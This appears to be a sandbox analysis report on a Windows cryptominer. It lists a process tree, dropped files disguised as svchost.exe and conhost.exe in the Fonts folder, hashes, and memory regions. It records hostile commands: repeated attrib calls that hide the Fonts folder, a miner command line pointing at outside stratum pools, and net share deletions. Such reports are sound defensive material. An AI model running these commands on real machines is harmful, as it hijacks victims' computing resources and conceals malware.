-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe1⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\rundlls.exe"rundlls" -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash2⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share c$ /delete1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share f$ /delete1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tem.vbsFilesize
215B
MD5535a478cc80a0fbbf990eed73f8788bb
SHA1459479dadaf00f3fa0de78f640c34dd426fd61aa
SHA256323a4134deb72847221aa880fffefe4c191d73bc69b4d246a5e9afb57dba6c51
SHA5123c96197cc51766f9d28fd69800865c88d015d50713a2aea6d71c097c6f4b0851535790f6adac51064b9b87c68dba268843ebb74a3da372dcc47eb39870ebdad1
-
C:\Windows\Fonts\conhost.exeFilesize
2.9MB
MD51b9583c6c3eab1da961aec9e42bfbcb8
SHA1c60f85fa6bcc463b3d38b7714916b241f2139650
SHA2566260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380
SHA5120bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4
-
C:\Windows\Fonts\rundlls.exeFilesize
5.2MB
MD5ed499b3a95e11ecf57e5131cd82c2a14
SHA17f37e85068457497f5f34e73edde4963694cfc19
SHA256c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5
SHA512f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\TEMP\csonhost.batFilesize
6KB
MD59da29265b1391c18f00c959c64b3fb65
SHA1dee2f9ded1706933f452ebcd2d5ccd8818af713e
SHA256fcf3e0486e76ea956d81dedfc64eaeb597ed0459d4356221f8f1e7f18d996824
SHA5126d9df7132fd07c8de64501d7df5ecc421f801724e6c854952a627aead0702e452fd366e439542e24960415c58145cf99c1231ac41815f7fece394d24a39260e2
-
\??\c:\windows\Fonts\conhost.exeFilesize
2.9MB
MD51b9583c6c3eab1da961aec9e42bfbcb8
SHA1c60f85fa6bcc463b3d38b7714916b241f2139650
SHA2566260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380
SHA5120bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4
-
\??\c:\windows\Fonts\rundlls.exeFilesize
5.2MB
MD5ed499b3a95e11ecf57e5131cd82c2a14
SHA17f37e85068457497f5f34e73edde4963694cfc19
SHA256c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5
SHA512f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0
-
\??\c:\windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
memory/376-205-0x0000000000000000-mapping.dmp
-
memory/740-215-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/740-206-0x0000000000000000-mapping.dmp
-
memory/820-163-0x0000000000000000-mapping.dmp
-
memory/880-188-0x0000000000000000-mapping.dmp
-
memory/980-222-0x0000000000000000-mapping.dmp
-
memory/1016-162-0x0000000000000000-mapping.dmp
-
memory/1044-196-0x0000000000000000-mapping.dmp
-
memory/1108-180-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1108-232-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1196-193-0x0000000000000000-mapping.dmp
-
memory/1272-150-0x0000000000000000-mapping.dmp
-
memory/1332-181-0x0000000000000000-mapping.dmp
-
memory/1340-199-0x0000000000000000-mapping.dmp
-
memory/1484-221-0x0000000000000000-mapping.dmp
-
memory/1504-211-0x0000000000000000-mapping.dmp
-
memory/1504-228-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1504-229-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1548-231-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1548-155-0x0000000000000000-mapping.dmp
-
memory/1548-171-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1676-197-0x0000000000000000-mapping.dmp
-
memory/1744-204-0x0000000000000000-mapping.dmp
-
memory/1748-202-0x0000000000000000-mapping.dmp
-
memory/1936-234-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1936-227-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1944-151-0x0000000000000000-mapping.dmp
-
memory/1956-191-0x0000000000000000-mapping.dmp
-
memory/1964-143-0x0000000000000000-mapping.dmp
-
memory/2020-187-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2020-165-0x0000000000000000-mapping.dmp
-
memory/2020-175-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2064-213-0x0000000000000000-mapping.dmp
-
memory/2100-194-0x0000000000000000-mapping.dmp
-
memory/2136-140-0x0000000000000000-mapping.dmp
-
memory/2164-189-0x0000000000400000-0x0000000000DEF000-memory.dmpFilesize
9.9MB
-
memory/2164-233-0x0000000000400000-0x0000000000DEF000-memory.dmpFilesize
9.9MB
-
memory/2164-183-0x0000000000000000-mapping.dmp
-
memory/2248-142-0x0000000000000000-mapping.dmp
-
memory/2324-198-0x0000000000000000-mapping.dmp
-
memory/2432-167-0x0000000000000000-mapping.dmp
-
memory/2520-207-0x0000000000000000-mapping.dmp
-
memory/2520-216-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2524-200-0x0000000000000000-mapping.dmp
-
memory/2524-141-0x0000000000000000-mapping.dmp
-
memory/2548-178-0x0000000000000000-mapping.dmp
-
memory/2576-153-0x0000000000000000-mapping.dmp
-
memory/2604-157-0x0000000000000000-mapping.dmp
-
memory/2604-172-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/3076-223-0x0000000000000000-mapping.dmp
-
memory/3076-226-0x0000017956410000-0x0000017956430000-memory.dmpFilesize
128KB
-
memory/3076-230-0x0000017956570000-0x00000179565B0000-memory.dmpFilesize
256KB
-
memory/3104-173-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/3104-176-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/3104-159-0x0000000000000000-mapping.dmp
-
memory/3264-139-0x0000000000000000-mapping.dmp
-
memory/3304-201-0x0000000000000000-mapping.dmp
-
